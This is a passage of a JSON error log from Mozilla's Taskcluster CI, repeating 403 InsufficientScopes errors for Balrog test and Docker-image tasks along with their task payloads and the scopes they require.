InsufficientScopes\\nstatusCode: 403\\nrequestInfo:\\n  method:   defineTask\\n  params:   {\\\"taskId\\\":\\\"R71owg2-QyqHyWJGj8UiPg\\\"}\\n  payload:  {\\n  \\\"provisionerId\\\": \\\"aws-provisioner-v1\\\",\\n  \\\"workerType\\\": \\\"github-worker\\\",\\n  \\\"routes\\\": [\\n    \\\"notify.irc-channel.#balrog.on-failed\\\",\\n    \\\"notify.irc-channel.#balrog.on-exception\\\"\\n  ],\\n  \\\"payload\\\": {\\n    \\\"maxRunTime\\\": 1200,\\n    \\\"image\\\": \\\"rail/python-test-runner\\\",\\n    \\\"command\\\": [\\n      \\\"/bin/bash\\\",\\n      \\\"-c\\\",\\n      \\\"git clone $GITHUB_HEAD_REPO_URL && cd balrog && git checkout $GITHUB_HEAD_BRANCH && bash run-tests.sh frontend\\\"\\n    ],\\n    \\\"features\\\": {\\n      \\\"dind\\\": true\\n    },\\n    \\\"env\\\": {\\n      \\\"GITHUB_EVENT\\\": \\\"push\\\",\\n      \\\"GITHUB_BRANCH\\\": \\\"master\\\",\\n      \\\"GITHUB_BASE_SHA\\\": \\\"c8ec8a917ef6090ed156500df8802dbb4d2ed2f4\\\",\\n      \\\"GITHUB_BASE_BRANCH\\\": \\\"master\\\",\\n      \\\"GITHUB_HEAD_REPO_URL\\\": \\\"https://github.com/mozilla/balrog.git\\\",\\n      \\\"GITHUB_HEAD_USER\\\": \\\"mozbhearsum\\\",\\n      \\\"GITHUB_HEAD_SHA\\\": \\\"7dea9b37e6f7919ab54c32dfa3f119d504d22ba5\\\",\\n      \\\"GITHUB_HEAD_BRANCH\\\": \\\"master\\\",\\n      \\\"GITHUB_HEAD_USER_EMAIL\\\": \\\"mozbhearsum@noreply.github.com\\\"\\n    }\\n  },\\n  \\\"extra\\\": {\\n    \\\"github\\\": {\\n      \\\"env\\\": true,\\n      \\\"events\\\": [\\n        \\\"pull_request.*\\\",\\n        \\\"push\\\"\\n      ]\\n    }\\n  },\\n  \\\"metadata\\\": {\\n    \\\"name\\\": \\\"Balrog front-end tests\\\",\\n    \\\"description\\\": \\\"Balrog JavaScript tests\\\",\\n    \\\"owner\\\": \\\"mozbhearsum@noreply.github.com\\\",\\n    \\\"source\\\": \\\"https://github.com/mozilla/balrog.git\\\"\\n  },\\n  \\\"created\\\": \\\"2016-09-19T13:49:51.200Z\\\",\\n  \\\"deadline\\\": \\\"2016-09-20T13:49:51.200Z\\\",\\n  \\\"schedulerId\\\": \\\"task-graph-scheduler\\\",\\n  \\\"taskGroupId\\\": \\\"RXoe9IZvRTmi7y9oxuNWGg\\\",\\n  \\\"dependencies\\\": [],\\n  \\\"requires\\\": \\\"all-completed\\\",\\n  \\\"priority\\\": \\\"normal\\\",\\n  \\\"retries\\\": 5,\\n  \\\"scopes\\\": [],\\n  \\\"tags\\\": {},\\n  \\\"expires\\\": \\\"2017-09-20T13:49:51.200Z\\\"\\n}\\n  time:     2016-09-19T13:49:51.402Z\\ndetails:\\n{\\n  \\\"scopesets\\\": [\\n    [\\n      \\\"queue:route:notify.irc-channel.#balrog.on-failed\\\",\\n      \\\"queue:route:notify.irc-channel.#balrog.on-exception\\\"\\n    ]\\n  ],\\n  \\\"scopes\\\": [\\n    \\\"assume:repo:github.com/mozilla/balrog:branch:master\\\",\\n    \\\"queue:create-task:aws-provisioner-v1/github-worker\\\",\\n    \\\"queue:route:index.garbage.*\\\",\\n    \\\"secrets:get:garbage/*\\\",\\n    \\\"secrets:get:repo:github.com/mozilla/balrog:dockerhub\\\",\\n    \\\"secrets:set:garbage/*\\\"\\n  ]\\n}\",\n        \"error\": {\n            \"code\": \"InsufficientScopes\",\n            \"message\": \"You do not have sufficient scopes. This request requires you\\nto have one of the following sets of scopes:\\n[\\n  [\\n    \\\"queue:route:notify.irc-channel.#balrog.on-failed\\\",\\n    \\\"queue:route:notify.irc-channel.#balrog.on-exception\\\"\\n  ]\\n]\\n\\nYou only have the scopes:\\n[\\n  \\\"assume:repo:github.com/mozilla/balrog:branch:master\\\",\\n  \\\"queue:create-task:aws-provisioner-v1/github-worker\\\",\\n  \\\"queue:route:index.garbage.*\\\",\\n  \\\"secrets:get:garbage/*\\\",\\n  \\\"secrets:get:repo:github.com/mozilla/balrog:dockerhub\\\",\\n  \\\"secrets:set:garbage/*\\\"\\n]\\n\\nIn other words you are missing scopes from one of the options:\\n * Option 0:\\n    - \\\"queue:route:notify.irc-channel.#balrog.on-failed\\\", and\\n    - \\\"queue:route:notify.irc-channel.#balrog.on-exception\\\"\\n----\\nerrorCode:  InsufficientScopes\\nstatusCode: 403\\nrequestInfo:\\n  method:   defineTask\\n  params:   {\\\"taskId\\\":\\\"R71owg2-QyqHyWJGj8UiPg\\\"}\\n  payload:  {\\n  \\\"provisionerId\\\": \\\"aws-provisioner-v1\\\",\\n  \\\"workerType\\\": \\\"github-worker\\\",\\n  \\\"routes\\\": [\\n    \\\"notify.irc-channel.#balrog.on-failed\\\",\\n    \\\"notify.irc-channel.#balrog.on-exception\\\"\\n  ],\\n  \\\"payload\\\": {\\n    \\\"maxRunTime\\\": 1200,\\n    \\\"image\\\": \\\"rail/python-test-runner\\\",\\n    \\\"command\\\": [\\n      \\\"/bin/bash\\\",\\n      \\\"-c\\\",\\n      \\\"git clone $GITHUB_HEAD_REPO_URL && cd balrog && git checkout $GITHUB_HEAD_BRANCH && bash run-tests.sh frontend\\\"\\n    ],\\n    \\\"features\\\": {\\n      \\\"dind\\\": true\\n    },\\n    \\\"env\\\": {\\n      \\\"GITHUB_EVENT\\\": \\\"push\\\",\\n      \\\"GITHUB_BRANCH\\\": \\\"master\\\",\\n      \\\"GITHUB_BASE_SHA\\\": \\\"c8ec8a917ef6090ed156500df8802dbb4d2ed2f4\\\",\\n      \\\"GITHUB_BASE_BRANCH\\\": \\\"master\\\",\\n      \\\"GITHUB_HEAD_REPO_URL\\\": \\\"https://github.com/mozilla/balrog.git\\\",\\n      \\\"GITHUB_HEAD_USER\\\": \\\"mozbhearsum\\\",\\n      \\\"GITHUB_HEAD_SHA\\\": \\\"7dea9b37e6f7919ab54c32dfa3f119d504d22ba5\\\",\\n      \\\"GITHUB_HEAD_BRANCH\\\": \\\"master\\\",\\n      \\\"GITHUB_HEAD_USER_EMAIL\\\": \\\"mozbhearsum@noreply.github.com\\\"\\n    }\\n  },\\n  \\\"extra\\\": {\\n    \\\"github\\\": {\\n      \\\"env\\\": true,\\n      \\\"events\\\": [\\n        \\\"pull_request.*\\\",\\n        \\\"push\\\"\\n      ]\\n    }\\n  },\\n  \\\"metadata\\\": {\\n    \\\"name\\\": \\\"Balrog front-end tests\\\",\\n    \\\"description\\\": \\\"Balrog JavaScript tests\\\",\\n    \\\"owner\\\": \\\"mozbhearsum@noreply.github.com\\\",\\n    \\\"source\\\": \\\"https://github.com/mozilla/balrog.git\\\"\\n  },\\n  \\\"created\\\": \\\"2016-09-19T13:49:51.200Z\\\",\\n  \\\"deadline\\\": \\\"2016-09-20T13:49:51.200Z\\\",\\n  \\\"schedulerId\\\": \\\"task-graph-scheduler\\\",\\n  \\\"taskGroupId\\\": \\\"RXoe9IZvRTmi7y9oxuNWGg\\\",\\n  \\\"dependencies\\\": [],\\n  \\\"requires\\\": \\\"all-completed\\\",\\n  \\\"priority\\\": \\\"normal\\\",\\n  \\\"retries\\\": 5,\\n  \\\"scopes\\\": [],\\n  \\\"tags\\\": {},\\n  \\\"expires\\\": \\\"2017-09-20T13:49:51.200Z\\\"\\n}\\n  time:     2016-09-19T13:49:51.402Z\\ndetails:\\n{\\n  \\\"scopesets\\\": [\\n    [\\n      \\\"queue:route:notify.irc-channel.#balrog.on-failed\\\",\\n      \\\"queue:route:notify.irc-channel.#balrog.on-exception\\\"\\n    ]\\n  ],\\n  \\\"scopes\\\": [\\n    \\\"assume:repo:github.com/mozilla/balrog:branch:master\\\",\\n    \\\"queue:create-task:aws-provisioner-v1/github-worker\\\",\\n    \\\"queue:route:index.garbage.*\\\",\\n    \\\"secrets:get:garbage/*\\\",\\n    \\\"secrets:get:repo:github.com/mozilla/balrog:dockerhub\\\",\\n    \\\"secrets:set:garbage/*\\\"\\n  ]\\n}\",\n            \"requestInfo\": {\n                \"method\": \"defineTask\",\n                \"params\": {\n                    \"taskId\": \"R71owg2-QyqHyWJGj8UiPg\"\n                },\n                \"payload\": {\n                    \"provisionerId\": \"aws-provisioner-v1\",\n                    \"workerType\": \"github-worker\",\n                    \"routes\": [\n                        \"notify.irc-channel.#balrog.on-failed\",\n                        \"notify.irc-channel.#balrog.on-exception\"\n                    ],\n                    \"payload\": {\n                        \"maxRunTime\": 1200,\n                        \"image\": \"rail/python-test-runner\",\n                        \"command\": [\n                            \"/bin/bash\",\n                            \"-c\",\n                            \"git clone $GITHUB_HEAD_REPO_URL && cd balrog && git checkout $GITHUB_HEAD_BRANCH && bash run-tests.sh frontend\"\n                        ],\n                        \"features\": {\n                            \"dind\": true\n                        },\n                        \"env\": {\n                            \"GITHUB_EVENT\": \"push\",\n                            \"GITHUB_BRANCH\": \"master\",\n                            \"GITHUB_BASE_SHA\": \"c8ec8a917ef6090ed156500df8802dbb4d2ed2f4\",\n                            \"GITHUB_BASE_BRANCH\": \"master\",\n                            \"GITHUB_HEAD_REPO_URL\": \"https://github.com/mozilla/balrog.git\",\n                            \"GITHUB_HEAD_USER\": \"mozbhearsum\",\n                            \"GITHUB_HEAD_SHA\": \"7dea9b37e6f7919ab54c32dfa3f119d504d22ba5\",\n                            \"GITHUB_HEAD_BRANCH\": \"master\",\n                            \"GITHUB_HEAD_USER_EMAIL\": \"mozbhearsum@noreply.github.com\"\n                        }\n                    },\n                    \"extra\": {\n                        \"github\": {\n                            \"env\": true,\n                            \"events\": [\n                                \"pull_request.*\",\n                                \"push\"\n                            ]\n                        }\n                    },\n                    \"metadata\": {\n                        \"name\": \"Balrog front-end tests\",\n                        \"description\": \"Balrog JavaScript tests\",\n                        \"owner\": \"mozbhearsum@noreply.github.com\",\n                        \"source\": \"https://github.com/mozilla/balrog.git\"\n                    },\n                    \"created\": \"2016-09-19T13:49:51.200Z\",\n                    \"deadline\": \"2016-09-20T13:49:51.200Z\",\n                    \"schedulerId\": \"task-graph-scheduler\",\n                    \"taskGroupId\": \"RXoe9IZvRTmi7y9oxuNWGg\",\n                    \"dependencies\": [],\n                    \"requires\": \"all-completed\",\n                    \"priority\": \"normal\",\n                    \"retries\": 5,\n                    \"scopes\": [],\n                    \"tags\": {},\n                    \"expires\": \"2017-09-20T13:49:51.200Z\"\n                },\n                \"time\": \"2016-09-19T13:49:51.402Z\"\n            },\n            \"details\": {\n                \"scopesets\": [\n                    [\n                        \"queue:route:notify.irc-channel.#balrog.on-failed\",\n                        \"queue:route:notify.irc-channel.#balrog.on-exception\"\n                    ]\n                ],\n                \"scopes\": [\n                    \"assume:repo:github.com/mozilla/balrog:branch:master\",\n                    \"queue:create-task:aws-provisioner-v1/github-worker\",\n                    \"queue:route:index.garbage.*\",\n                    \"secrets:get:garbage/*\",\n                    \"secrets:get:repo:github.com/mozilla/balrog:dockerhub\",\n                    \"secrets:set:garbage/*\"\n                ]\n            }\n        }\n    },\n    {\n        \"message\": \"You do not have sufficient scopes. This request requires you\\nto have one of the following sets of scopes:\\n[\\n  [\\n    \\\"queue:route:notify.irc-channel.#balrog.on-failed\\\",\\n    \\\"queue:route:notify.irc-channel.#balrog.on-exception\\\"\\n  ]\\n]\\n\\nYou only have the scopes:\\n[\\n  \\\"assume:repo:github.com/mozilla/balrog:branch:master\\\",\\n  \\\"queue:create-task:aws-provisioner-v1/github-worker\\\",\\n  \\\"queue:route:index.garbage.*\\\",\\n  \\\"secrets:get:garbage/*\\\",\\n  \\\"secrets:get:repo:github.com/mozilla/balrog:dockerhub\\\",\\n  \\\"secrets:set:garbage/*\\\"\\n]\\n\\nIn other words you are missing scopes from one of the options:\\n * Option 0:\\n    - \\\"queue:route:notify.irc-channel.#balrog.on-failed\\\", and\\n    - \\\"queue:route:notify.irc-channel.#balrog.on-exception\\\"\\n----\\nerrorCode:  InsufficientScopes\\nstatusCode: 403\\nrequestInfo:\\n  method:   defineTask\\n  params:   {\\\"taskId\\\":\\\"LxMLyNuOSU-IYq0BJLQnKw\\\"}\\n  payload:  {\\n  \\\"provisionerId\\\": \\\"aws-provisioner-v1\\\",\\n  \\\"workerType\\\": \\\"github-worker\\\",\\n  \\\"routes\\\": [\\n    \\\"notify.irc-channel.#balrog.on-failed\\\",\\n    \\\"notify.irc-channel.#balrog.on-exception\\\"\\n  ],\\n  \\\"payload\\\": {\\n    \\\"maxRunTime\\\": 1200,\\n    \\\"image\\\": \\\"rail/python-test-runner\\\",\\n    \\\"command\\\": [\\n      \\\"/bin/bash\\\",\\n      \\\"-c\\\",\\n      \\\"git clone $GITHUB_HEAD_REPO_URL && cd balrog && git checkout $GITHUB_HEAD_BRANCH && cd agent && bash run-tests.sh\\\"\\n    ],\\n    \\\"features\\\": {\\n      \\\"dind\\\": true\\n    },\\n    \\\"env\\\": {\\n      \\\"GITHUB_EVENT\\\": \\\"push\\\",\\n      \\\"GITHUB_BRANCH\\\": \\\"master\\\",\\n      \\\"GITHUB_BASE_SHA\\\": \\\"c8ec8a917ef6090ed156500df8802dbb4d2ed2f4\\\",\\n      \\\"GITHUB_BASE_BRANCH\\\": \\\"master\\\",\\n      \\\"GITHUB_HEAD_REPO_URL\\\": \\\"https://github.com/mozilla/balrog.git\\\",\\n      \\\"GITHUB_HEAD_USER\\\": \\\"mozbhearsum\\\",\\n      \\\"GITHUB_HEAD_SHA\\\": \\\"7dea9b37e6f7919ab54c32dfa3f119d504d22ba5\\\",\\n      \\\"GITHUB_HEAD_BRANCH\\\": \\\"master\\\",\\n      \\\"GITHUB_HEAD_USER_EMAIL\\\": \\\"mozbhearsum@noreply.github.com\\\"\\n    }\\n  },\\n  \\\"extra\\\": {\\n    \\\"github\\\": {\\n      \\\"env\\\": true,\\n      \\\"events\\\": [\\n        \\\"pull_request.*\\\",\\n        \\\"push\\\"\\n      ]\\n    }\\n  },\\n  \\\"metadata\\\": {\\n    \\\"name\\\": \\\"Balrog Agent Tests\\\",\\n    \\\"description\\\": \\\"Balrog Agent Tests\\\",\\n    \\\"owner\\\": \\\"mozbhearsum@noreply.github.com\\\",\\n    \\\"source\\\": \\\"https://github.com/mozilla/balrog.git\\\"\\n  },\\n  \\\"created\\\": \\\"2016-09-19T13:49:51.201Z\\\",\\n  \\\"deadline\\\": \\\"2016-09-20T13:49:51.201Z\\\",\\n  \\\"schedulerId\\\": \\\"task-graph-scheduler\\\",\\n  \\\"taskGroupId\\\": \\\"RXoe9IZvRTmi7y9oxuNWGg\\\",\\n  \\\"dependencies\\\": [],\\n  \\\"requires\\\": \\\"all-completed\\\",\\n  \\\"priority\\\": \\\"normal\\\",\\n  \\\"retries\\\": 5,\\n  \\\"scopes\\\": [],\\n  \\\"tags\\\": {},\\n  \\\"expires\\\": \\\"2017-09-20T13:49:51.201Z\\\"\\n}\\n  time:     2016-09-19T13:49:51.410Z\\ndetails:\\n{\\n  \\\"scopesets\\\": [\\n    [\\n      \\\"queue:route:notify.irc-channel.#balrog.on-failed\\\",\\n      \\\"queue:route:notify.irc-channel.#balrog.on-exception\\\"\\n    ]\\n  ],\\n  \\\"scopes\\\": [\\n    \\\"assume:repo:github.com/mozilla/balrog:branch:master\\\",\\n    \\\"queue:create-task:aws-provisioner-v1/github-worker\\\",\\n    \\\"queue:route:index.garbage.*\\\",\\n    \\\"secrets:get:garbage/*\\\",\\n    \\\"secrets:get:repo:github.com/mozilla/balrog:dockerhub\\\",\\n    \\\"secrets:set:garbage/*\\\"\\n  ]\\n}\",\n        \"error\": {\n            \"code\": \"InsufficientScopes\",\n            \"message\": \"You do not have sufficient scopes. This request requires you\\nto have one of the following sets of scopes:\\n[\\n  [\\n    \\\"queue:route:notify.irc-channel.#balrog.on-failed\\\",\\n    \\\"queue:route:notify.irc-channel.#balrog.on-exception\\\"\\n  ]\\n]\\n\\nYou only have the scopes:\\n[\\n  \\\"assume:repo:github.com/mozilla/balrog:branch:master\\\",\\n  \\\"queue:create-task:aws-provisioner-v1/github-worker\\\",\\n  \\\"queue:route:index.garbage.*\\\",\\n  \\\"secrets:get:garbage/*\\\",\\n  \\\"secrets:get:repo:github.com/mozilla/balrog:dockerhub\\\",\\n  \\\"secrets:set:garbage/*\\\"\\n]\\n\\nIn other words you are missing scopes from one of the options:\\n * Option 0:\\n    - \\\"queue:route:notify.irc-channel.#balrog.on-failed\\\", and\\n    - \\\"queue:route:notify.irc-channel.#balrog.on-exception\\\"\\n----\\nerrorCode:  InsufficientScopes\\nstatusCode: 403\\nrequestInfo:\\n  method:   defineTask\\n  params:   {\\\"taskId\\\":\\\"LxMLyNuOSU-IYq0BJLQnKw\\\"}\\n  payload:  {\\n  \\\"provisionerId\\\": \\\"aws-provisioner-v1\\\",\\n  \\\"workerType\\\": \\\"github-worker\\\",\\n  \\\"routes\\\": [\\n    \\\"notify.irc-channel.#balrog.on-failed\\\",\\n    \\\"notify.irc-channel.#balrog.on-exception\\\"\\n  ],\\n  \\\"payload\\\": {\\n    \\\"maxRunTime\\\": 1200,\\n    \\\"image\\\": \\\"rail/python-test-runner\\\",\\n    \\\"command\\\": [\\n      \\\"/bin/bash\\\",\\n      \\\"-c\\\",\\n      \\\"git clone $GITHUB_HEAD_REPO_URL && cd balrog && git checkout $GITHUB_HEAD_BRANCH && cd agent && bash run-tests.sh\\\"\\n    ],\\n    \\\"features\\\": {\\n      \\\"dind\\\": true\\n    },\\n    \\\"env\\\": {\\n      \\\"GITHUB_EVENT\\\": \\\"push\\\",\\n      \\\"GITHUB_BRANCH\\\": \\\"master\\\",\\n      \\\"GITHUB_BASE_SHA\\\": \\\"c8ec8a917ef6090ed156500df8802dbb4d2ed2f4\\\",\\n      \\\"GITHUB_BASE_BRANCH\\\": \\\"master\\\",\\n      \\\"GITHUB_HEAD_REPO_URL\\\": \\\"https://github.com/mozilla/balrog.git\\\",\\n      \\\"GITHUB_HEAD_USER\\\": \\\"mozbhearsum\\\",\\n      \\\"GITHUB_HEAD_SHA\\\": \\\"7dea9b37e6f7919ab54c32dfa3f119d504d22ba5\\\",\\n      \\\"GITHUB_HEAD_BRANCH\\\": \\\"master\\\",\\n      \\\"GITHUB_HEAD_USER_EMAIL\\\": \\\"mozbhearsum@noreply.github.com\\\"\\n    }\\n  },\\n  \\\"extra\\\": {\\n    \\\"github\\\": {\\n      \\\"env\\\": true,\\n      \\\"events\\\": [\\n        \\\"pull_request.*\\\",\\n        \\\"push\\\"\\n      ]\\n    }\\n  },\\n  \\\"metadata\\\": {\\n    \\\"name\\\": \\\"Balrog Agent Tests\\\",\\n    \\\"description\\\": \\\"Balrog Agent Tests\\\",\\n    \\\"owner\\\": \\\"mozbhearsum@noreply.github.com\\\",\\n    \\\"source\\\": \\\"https://github.com/mozilla/balrog.git\\\"\\n  },\\n  \\\"created\\\": \\\"2016-09-19T13:49:51.201Z\\\",\\n  \\\"deadline\\\": \\\"2016-09-20T13:49:51.201Z\\\",\\n  \\\"schedulerId\\\": \\\"task-graph-scheduler\\\",\\n  \\\"taskGroupId\\\": \\\"RXoe9IZvRTmi7y9oxuNWGg\\\",\\n  \\\"dependencies\\\": [],\\n  \\\"requires\\\": \\\"all-completed\\\",\\n  \\\"priority\\\": \\\"normal\\\",\\n  \\\"retries\\\": 5,\\n  \\\"scopes\\\": [],\\n  \\\"tags\\\": {},\\n  \\\"expires\\\": \\\"2017-09-20T13:49:51.201Z\\\"\\n}\\n  time:     2016-09-19T13:49:51.410Z\\ndetails:\\n{\\n  \\\"scopesets\\\": [\\n    [\\n      \\\"queue:route:notify.irc-channel.#balrog.on-failed\\\",\\n      \\\"queue:route:notify.irc-channel.#balrog.on-exception\\\"\\n    ]\\n  ],\\n  \\\"scopes\\\": [\\n    \\\"assume:repo:github.com/mozilla/balrog:branch:master\\\",\\n    \\\"queue:create-task:aws-provisioner-v1/github-worker\\\",\\n    \\\"queue:route:index.garbage.*\\\",\\n    \\\"secrets:get:garbage/*\\\",\\n    \\\"secrets:get:repo:github.com/mozilla/balrog:dockerhub\\\",\\n    \\\"secrets:set:garbage/*\\\"\\n  ]\\n}\",\n            \"requestInfo\": {\n                \"method\": \"defineTask\",\n                \"params\": {\n                    \"taskId\": \"LxMLyNuOSU-IYq0BJLQnKw\"\n                },\n                \"payload\": {\n                    \"provisionerId\": \"aws-provisioner-v1\",\n                    \"workerType\": \"github-worker\",\n                    \"routes\": [\n                        \"notify.irc-channel.#balrog.on-failed\",\n                        \"notify.irc-channel.#balrog.on-exception\"\n                    ],\n                    \"payload\": {\n                        \"maxRunTime\": 1200,\n                        \"image\": \"rail/python-test-runner\",\n                        \"command\": [\n                            \"/bin/bash\",\n                            \"-c\",\n                            \"git clone $GITHUB_HEAD_REPO_URL && cd balrog && git checkout $GITHUB_HEAD_BRANCH && cd agent && bash run-tests.sh\"\n                        ],\n                        \"features\": {\n                            \"dind\": true\n                        },\n                        \"env\": {\n                            \"GITHUB_EVENT\": \"push\",\n                            \"GITHUB_BRANCH\": \"master\",\n                            \"GITHUB_BASE_SHA\": \"c8ec8a917ef6090ed156500df8802dbb4d2ed2f4\",\n                            \"GITHUB_BASE_BRANCH\": \"master\",\n                            \"GITHUB_HEAD_REPO_URL\": \"https://github.com/mozilla/balrog.git\",\n                            \"GITHUB_HEAD_USER\": \"mozbhearsum\",\n                            \"GITHUB_HEAD_SHA\": \"7dea9b37e6f7919ab54c32dfa3f119d504d22ba5\",\n                            \"GITHUB_HEAD_BRANCH\": \"master\",\n                            \"GITHUB_HEAD_USER_EMAIL\": \"mozbhearsum@noreply.github.com\"\n                        }\n                    },\n                    \"extra\": {\n                        \"github\": {\n                            \"env\": true,\n                            \"events\": [\n                                \"pull_request.*\",\n                                \"push\"\n                            ]\n                        }\n                    },\n                    \"metadata\": {\n                        \"name\": \"Balrog Agent Tests\",\n                        \"description\": \"Balrog Agent Tests\",\n                        \"owner\": \"mozbhearsum@noreply.github.com\",\n                        \"source\": \"https://github.com/mozilla/balrog.git\"\n                    },\n                    \"created\": \"2016-09-19T13:49:51.201Z\",\n                    \"deadline\": \"2016-09-20T13:49:51.201Z\",\n                    \"schedulerId\": \"task-graph-scheduler\",\n                    \"taskGroupId\": \"RXoe9IZvRTmi7y9oxuNWGg\",\n                    \"dependencies\": [],\n                    \"requires\": \"all-completed\",\n                    \"priority\": \"normal\",\n                    \"retries\": 5,\n                    \"scopes\": [],\n                    \"tags\": {},\n                    \"expires\": \"2017-09-20T13:49:51.201Z\"\n                },\n                \"time\": \"2016-09-19T13:49:51.410Z\"\n            },\n            \"details\": {\n                \"scopesets\": [\n                    [\n                        \"queue:route:notify.irc-channel.#balrog.on-failed\",\n                        \"queue:route:notify.irc-channel.#balrog.on-exception\"\n                    ]\n                ],\n                \"scopes\": [\n                    \"assume:repo:github.com/mozilla/balrog:branch:master\",\n                    \"queue:create-task:aws-provisioner-v1/github-worker\",\n                    \"queue:route:index.garbage.*\",\n                    \"secrets:get:garbage/*\",\n                    \"secrets:get:repo:github.com/mozilla/balrog:dockerhub\",\n                    \"secrets:set:garbage/*\"\n                ]\n            }\n        }\n    },\n    {\n        \"message\": \"You do not have sufficient scopes. This request requires you\\nto have one of the following sets of scopes:\\n[\\n  [\\n    \\\"secrets:get:repo:github.com/mozilla/balrog:dockerhub\\\",\\n    \\\"queue:route:notify.irc-channel.#balrog.on-failed\\\",\\n    \\\"queue:route:notify.irc-channel.#balrog.on-exception\\\"\\n  ]\\n]\\n\\nYou only have the scopes:\\n[\\n  \\\"assume:repo:github.com/mozilla/balrog:branch:master\\\",\\n  \\\"queue:create-task:aws-provisioner-v1/github-worker\\\",\\n  \\\"queue:route:index.garbage.*\\\",\\n  \\\"secrets:get:garbage/*\\\",\\n  \\\"secrets:get:repo:github.com/mozilla/balrog:dockerhub\\\",\\n  \\\"secrets:set:garbage/*\\\"\\n]\\n\\nIn other words you are missing scopes from one of the options:\\n * Option 0:\\n    - \\\"queue:route:notify.irc-channel.#balrog.on-failed\\\", and\\n    - \\\"queue:route:notify.irc-channel.#balrog.on-exception\\\"\\n----\\nerrorCode:  InsufficientScopes\\nstatusCode: 403\\nrequestInfo:\\n  method:   defineTask\\n  params:   {\\\"taskId\\\":\\\"ZTwlIMSQR12JG7kyewgf6A\\\"}\\n  payload:  {\\n  \\\"provisionerId\\\": \\\"aws-provisioner-v1\\\",\\n  \\\"workerType\\\": \\\"github-worker\\\",\\n  \\\"routes\\\": [\\n    \\\"notify.irc-channel.#balrog.on-failed\\\",\\n    \\\"notify.irc-channel.#balrog.on-exception\\\"\\n  ],\\n  \\\"scopes\\\": [\\n    \\\"secrets:get:repo:github.com/mozilla/balrog:dockerhub\\\"\\n  ],\\n  \\\"payload\\\": {\\n    \\\"maxRunTime\\\": 3600,\\n    \\\"image\\\": \\\"taskcluster/image_builder:0.1.3\\\",\\n    \\\"features\\\": {\\n      \\\"dind\\\": true,\\n      \\\"taskclusterProxy\\\": true\\n    },\\n    \\\"command\\\": [\\n      \\\"/bin/bash\\\",\\n      \\\"-c\\\",\\n      \\\"git clone $GITHUB_HEAD_REPO_URL && cd balrog && git checkout $GITHUB_HEAD_BRANCH && scripts/push-dockerimage.sh\\\"\\n    ],\\n    \\\"env\\\": {\\n      \\\"GITHUB_EVENT\\\": \\\"push\\\",\\n      \\\"GITHUB_BRANCH\\\": \\\"master\\\",\\n      \\\"GITHUB_BASE_SHA\\\": \\\"c8ec8a917ef6090ed156500df8802dbb4d2ed2f4\\\",\\n      \\\"GITHUB_BASE_BRANCH\\\": \\\"master\\\",\\n      \\\"GITHUB_HEAD_REPO_URL\\\": \\\"https://github.com/mozilla/balrog.git\\\",\\n      \\\"GITHUB_HEAD_USER\\\": \\\"mozbhearsum\\\",\\n      \\\"GITHUB_HEAD_SHA\\\": \\\"7dea9b37e6f7919ab54c32dfa3f119d504d22ba5\\\",\\n      \\\"GITHUB_HEAD_BRANCH\\\": \\\"master\\\",\\n      \\\"GITHUB_HEAD_USER_EMAIL\\\": \\\"mozbhearsum@noreply.github.com\\\"\\n    }\\n  },\\n  \\\"extra\\\": {\\n    \\\"github\\\": {\\n      \\\"env\\\": true,\\n      \\\"events\\\": [\\n        \\\"push\\\"\\n      ],\\n      \\\"branches\\\": [\\n        \\\"master\\\"\\n      ]\\n    }\\n  },\\n  \\\"metadata\\\": {\\n    \\\"name\\\": \\\"Balrog Docker Image Creation\\\",\\n    \\\"description\\\": \\\"Balrog Docker Image Creation\\\",\\n    \\\"owner\\\": \\\"mozbhearsum@noreply.github.com\\\",\\n    \\\"source\\\": \\\"https://github.com/mozilla/balrog.git\\\"\\n  },\\n  \\\"created\\\": \\\"2016-09-19T13:49:51.201Z\\\",\\n  \\\"deadline\\\": \\\"2016-09-20T13:49:51.201Z\\\",\\n  \\\"schedulerId\\\": \\\"task-graph-scheduler\\\",\\n  \\\"taskGroupId\\\": \\\"RXoe9IZvRTmi7y9oxuNWGg\\\",\\n  \\\"dependencies\\\": [],\\n  \\\"requires\\\": \\\"all-completed\\\",\\n  \\\"priority\\\": \\\"normal\\\",\\n  \\\"retries\\\": 5,\\n  \\\"tags\\\": {},\\n  \\\"expires\\\": \\\"2017-09-20T13:49:51.201Z\\\"\\n}\\n  time:     2016-09-19T13:49:51.407Z\\ndetails:\\n{\\n  \\\"scopesets\\\": [\\n    [\\n      \\\"secrets:get:repo:github.com/mozilla/balrog:dockerhub\\\",\\n      \\\"queue:route:notify.irc-channel.#balrog.on-failed\\\",\\n      \\\"queue:route:notify.irc-channel.#balrog.on-exception\\\"\\n    ]\\n  ],\\n  \\\"scopes\\\": [\\n    \\\"assume:repo:github.com/mozilla/balrog:branch:master\\\",\\n    \\\"queue:create-task:aws-provisioner-v1/github-worker\\\",\\n    \\\"queue:route:index.garbage.*\\\",\\n    \\\"secrets:get:garbage/*\\\",\\n    \\\"secrets:get:repo:github.com/mozilla/balrog:dockerhub\\\",\\n    \\\"secrets:set:garbage/*\\\"\\n  ]\\n}\",\n        \"error\": {\n            \"code\": \"InsufficientScopes\",\n            \"message\": \"You do not have sufficient scopes. This request requires you\\nto have one of the following sets of scopes:\\n[\\n  [\\n    \\\"secrets:get:repo:github.com/mozilla/balrog:dockerhub\\\",\\n    \\\"queue:route:notify.irc-channel.#balrog.on-failed\\\",\\n    \\\"queue:route:notify.irc-channel.#balrog.on-exception\\\"\\n  ]\\n]\\n\\nYou only have the scopes:\\n[\\n  \\\"assume:repo:github.com/mozilla/balrog:branch:master\\\",\\n  \\\"queue:create-task:aws-provisioner-v1/github-worker\\\",\\n  \\\"queue:route:index.garbage.*\\\",\\n  \\\"secrets:get:garbage/*\\\",\\n  \\\"secrets:get:repo:github.com/mozilla/balrog:dockerhub\\\",\\n  \\\"secrets:set:garbage/*\\\"\\n]\\n\\nIn other words you are missing scopes from one of the options:\\n * Option 0:\\n    - \\\"queue:route:notify.irc-channel.#balrog.on-failed\\\", and\\n    - \\\"queue:route:notify.irc-channel.#balrog.on-exception\\\"\\n----\\nerrorCode:  InsufficientScopes\\nstatusCode: 403\\nrequestInfo:\\n  method:   defineTask\\n  params:   {\\\"taskId\\\":\\\"ZTwlIMSQR12JG7kyewgf6A\\\"}\\n  payload:  {\\n  \\\"provisionerId\\\": \\\"aws-provisioner-v1\\\",\\n  \\\"workerType\\\": \\\"github-worker\\\",\\n  \\\"routes\\\": [\\n    \\\"notify.irc-channel.#balrog.on-failed\\\",\\n    \\\"notify.irc-channel.#balrog.on-exception\\\"\\n  ],\\n  \\\"scopes\\\": [\\n    